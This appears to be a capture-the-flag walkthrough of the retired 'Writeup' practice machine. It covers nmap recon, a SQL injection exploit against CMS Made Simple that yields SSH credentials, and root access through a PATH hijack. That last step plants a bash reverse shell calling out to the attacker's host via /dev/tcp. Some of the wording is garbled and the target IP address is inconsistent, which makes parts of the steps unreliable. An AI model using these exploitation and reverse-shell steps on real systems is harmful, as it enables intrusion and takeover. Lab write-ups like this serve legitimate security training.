Learn to work with Writeup Box

Learn to work with Writeup Box


Introduction

Switch to a new blog. Today we’re going to go through the Writeup machine’s walkthrough based on the recently retired Linux machine. Since it was classified into the easy category, it was a bit tricky. It was quite easy to get the user flag, but during the privilege escalation phase it got a bit stuck. So without further ado let’s begin…

Learn to work with Writeup Box

Recon

We’re going to start our reconciliation with a Nmap scan.

nmap -sC -sV 10.10.10.138

Learn to work with Writeup Box

As we can see port 80 is open, let’s check that in our browser first.

Learn to work with Writeup Box

As you can see from the above text, a script for DoS security has been introduced so we’re not going to be blurring here for folders and files.

Returning to our Nmap scan, we can clearly see an unauthorized entry called /writeup/ in the robots.txt file. Let’s go to that article.

Learn to work with Writeup Box

Let’s try to see if we can get any clue from that source code.

Learn to work with Writeup Box

Ok, it looks like the page is built using a CMS made simple framework.

Exploitation

Going back to our terminal, let’s use searchsploit to search for any available exploits: searchsploit “ CMS made simple "

Learn to work with Writeup Box

Looks like an exploit for SQL injection, let’s try to use it because it affects all versions less than 2.2.10. More details about this could be found here

Let’s look at the code once before we go further.

Learn to work with Writeup Box

It’s a time-based SQL injection as per the definition and we can also define a password cracking wordlist so let’s run this code along with our favorite wordlist password: rockyou.txt

python -u http://10.10.10.138/writeup/ –crack -w

Learn to work with Writeup Box
Learn to work with Writeup Box

We have got the username and password successfully.

username: jkr

password: raykayjay9

Now if you recall, we also had ssh port(22) available. Let’s start using the credentials above. Type the ssh command below to log in to the server.

ssh jkr@10.10.10.148

Let’s type the password as above and we should get our user flag in the current directory after logging in.

Learn to work with Writeup Box

Privilege Escalation

Let’s look for our root flag now. We can start by continuously monitoring the system with an incredible tool / script called pspy

We can migrate it either by scp or simply by using python / apache to host it on our web server. Let’s run pspy right now …

Learn to work with Writeup Box

Although there is a lot of information above, let’s just look at the PATH Function there and command run-parts running as UID 0. For those who don’t know the PATH function is just an environment variable in Linux and other Unix-like operating systems that tells the shell which directories to scan to executable files in response to a user’s commands.

Simply put, if we want to run an executable file, we go to the directory where it is present and run it by typing it. “./filename” However if we just want to run the file from any directory by typing in “filename"Without “./,” the directory path must be added to the PATH variable. More details can be found here

Let’s test the run-parts route by type in “ which run-parts ” and also check the variable path by typing in “ echo $PATH " .

And this is what we have in the vector PATH:

Learn to work with Writeup Box

Now the next move is to search all the directories in the box that can be posted. Type in “ find / -type d -writable 2>/dev/null "

Learn to work with Writeup Box

Looks like the /usr / local / bin/ directory can be written and is also included in the PATH variable so we can add our own run-parts file to that directory that would contain our reverse shell and send us our reverse shell when it is executed.

Let’s put our reverse shell in run-parts first and position it in /usr / local / bin/ by typing in: echo “/bin/bash -c bash -i >& /dev/tcp/10.10.15.171/1234 0>&1” > /usr/local/bin/run-parts You will receive a list of reverse shells pentestmonkey.

Next, let’s allow the file to be executed:

chmod 777 /usr/local/bin/run-parts

Now let’s go to our other terminal and open our port for netcat listening:

nc -lnvp 1234

Learn to work with Writeup Box

All we have to do now is wait for our file to run automatically after a few minutes depending on the box’s traffic. If the traffic is less for VIP users in particular, you can simply open another terminal and log in to start another ssh session.

And we got our reverse shell as root after a few minutes.

Learn to work with Writeup Box

Let’s transfer to the directory of root and see the file of root.txt.

Learn to work with Writeup Box

That’s how we got our root flag and successfully completed the challenge.

That’s all for now. See you next time.



Solutions

Solutions

Services

Services